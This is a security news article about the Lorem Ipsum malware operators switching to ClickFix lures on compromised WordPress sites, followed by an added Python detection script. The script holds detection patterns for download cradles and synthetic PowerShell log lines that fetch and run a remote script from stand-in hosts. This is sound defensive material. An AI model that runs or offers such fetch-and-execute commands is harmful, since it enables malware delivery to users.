Microsoft’s disruption of malware-signing-as-a-service provider Fox Tempest last month has forced the operators of the Lorem Ipsum shellcode loader and backdoor to abandon their delivery method of Trojanized Microsoft Teams installers in favor of ClickFix lures.

Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown may have temporarily disrupted the threat actors behind Lorem Ipsum, they quickly moved to a new and potentially more dangerous delivery model.

Making a Quick Pivot to ClickFix

“The loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely,” BlueVoyant said in its report on Tuesday. 


Instead, the threat actors are now relying on ClickFix lures hosted on compromised WordPress sites to deliver their malware. “The pivot significantly broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites,” the company noted.

BlueVoyant had initially assessed Lorem Ipsum, which launched in February 2026, to be a rapidly maturing malware campaign likely operated by a sophisticated, mid-tier initial access broker. The company has since revised that assessment and now strongly believes the campaign is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. The threat actor has been active since at least mid-2022 and is associated with multiple ransomware families, including Rhysida, BlackCat, Zeppelin, and Quantum Locker, according to BlueVoyant.

The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems. 

BlueVoyant’s analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses. The malware also assigns unique identifiers to track and manage individual victim infections, according to BlueVoyant.


ClickFix Lures on WordPress Sites

For the new ClickFix delivery model, Lorem Ipsum’s operator is currently using at least five legitimate but compromised WordPress websites to host its ClickFix lures. The attack chain begins when a user arrives at one of the websites, which span multiple sectors including architecture, legal services and construction technology. An injected iframe on the website displays a fake browser update notification about the user’s browser being out of date.

In a manner similar to other ClickFix scams, the pop-up instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message telling the user their browser has been updated.

A Troubling Connection to Ransomware Actors

BlueVoyant’s view that Lorem Ipsum is linked to Rapid Brigantine is significant for defenders because it suggests the campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims. According to the security vendor, there are multiple indicators that the two operations are linked. These include a Microsoft report in October 2025 that described an SEO-poisoning-driven Vanilla Tempest campaign involving Teams installers; the shared use of Forging Marauder/Fox Tempest to obtain malware-signing certificates; and a DFIR report in which a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine.


The Lorem Ipsum campaign is the latest example of how resilient modern threat actors have become to disruption. Rather than letting Microsoft’s takedown of the Fox Tempest signing service end their operations, the Lorem Ipsum actors pivoted to a new delivery model that has, if anything, heightened their threat profile.

For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Instead, organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate Web infrastructure abuse, and user execution of malicious commands, BlueVoyant noted.

“Defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators’ demonstrated capacity for rapid pivot in response to disruption,” the security vendor said. “The most operationally valuable controls focus on the consistent behaviors that span Rapid Brigantine’s multiple delivery pipelines,” rather than individual delivery mechanisms or malware variants.
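The following Python is an added example, not BlueVoyant’s tooling or anything published with its report. It applies the behavioral-detection approach the vendor recommends to the ClickFix chain described above: a PowerShell process launched from an interactive parent (Windows Terminal or Explorer) whose command line contains a download cradle, inline execution, and window-hiding or encoding flags. The one-line record format, the file paths, the `.invalid` hostnames, the scoring weights and the threshold are all assumptions constructed for this example; the records are synthetic Sysmon Event ID 1-style lines, not real telemetry.

```python
"""Behavioral triage of process-creation records for ClickFix-style execution.

Added example (not BlueVoyant's or the article's code). The record format,
paths, hostnames, weights and threshold are assumptions built for this example.
"""
import base64
import ntpath
import re
from dataclasses import dataclass

# Hypothetical one-line export of Sysmon Event ID 1 fields (constructed format).
RECORD = re.compile(
    r"^ParentImage=(?P<parent>.+?) Image=(?P<image>.+?) CommandLine=(?P<cmd>.*)$")

# Behaviors that survive a change of lure site, C2 domain or binary hash.
CRADLE = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring"
                    r"|downloadfile|net\.webclient|invoke-restmethod|\birm\b", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression|start-process|\bsaps\b", re.I)
STEALTH = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b"
                     r"|-e(?:xecutionpolicy|p)\s+bypass", re.I)
# -e / -ec / -en / -enc / -encoded / -encodedcommand followed by base64.
ENCODED = re.compile(r"(?<!\S)-e(?:ncodedcommand|ncoded|nc|n|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)

INTERACTIVE_PARENTS = {"windowsterminal.exe", "explorer.exe", "cmd.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
WEIGHTS = {"shell_from_interactive_parent": 1, "download_cradle": 2,
           "inline_execution": 2, "stealth_flags": 1, "encoded_command": 1}
THRESHOLD = 4  # assumed: a cradle plus inline execution is enough on its own


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def parse_log(text):
    """Parse the constructed record format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if m:
            events.append(ProcessEvent(m["parent"], m["image"], m["cmd"]))
    return events


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Score one process-creation event on behaviors rather than static indicators."""
    decoded = decode_encoded_command(event.command_line)
    text = event.command_line + (" " + decoded if decoded else "")  # scan both forms
    findings = []
    if (ntpath.basename(event.image).lower() in SHELLS
            and ntpath.basename(event.parent_image).lower() in INTERACTIVE_PARENTS):
        findings.append("shell_from_interactive_parent")
    if CRADLE.search(text):
        findings.append("download_cradle")
    if EXEC.search(text):
        findings.append("inline_execution")
    if STEALTH.search(event.command_line):
        findings.append("stealth_flags")
    if decoded is not None:
        findings.append("encoded_command")
    score = sum(WEIGHTS[f] for f in findings)
    return {"score": score, "findings": findings, "decoded": decoded,
            "verdict": "clickfix_suspect" if score >= THRESHOLD else "benign"}


def triage(text):
    return [analyze(e) for e in parse_log(text)]


# Constructed sample records (not real telemetry); hosts use the reserved .invalid TLD.
_ENC = base64.b64encode("IEX (IWR http://c.example.invalid/u.ps1)".encode("utf-16le")).decode()
SAMPLE_LOG = rf"""
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -NoProfile -w hidden -c "iex (iwr http://cdn.example.invalid/edge-si-update.ps1 -UseBasicParsing); Write-Host 'Browser updated successfully'"
ParentImage=C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\WindowsTerminal.exe Image=C:\Program Files\PowerShell\7\pwsh.exe CommandLine=pwsh.exe -nop -ep bypass -enc {_ENC}
ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe -NoProfile -File C:\ProgramData\Inventory\collect.ps1
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell.exe Get-ChildItem C:\Users\alice\Documents
"""

if __name__ == "__main__":
    for ev, res in zip(parse_log(SAMPLE_LOG), triage(SAMPLE_LOG)):
        print(f"{res['verdict']:16} score={res['score']} "
              f"{ntpath.basename(ev.image)} <- {ntpath.basename(ev.parent_image)} {res['findings']}")
```

Running the file prints one verdict per record: the two pasted ClickFix commands are flagged on the cradle-plus-execution behavior (the encoded one only after the `-enc` payload is decoded), while the scheduled inventory script and the interactive directory listing stay benign even though each trips one weak signal. The hostnames would change with the next pivot; the behaviors are what a production rule over real Sysmon Event ID 1 or Security 4688 command-line auditing should key on.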
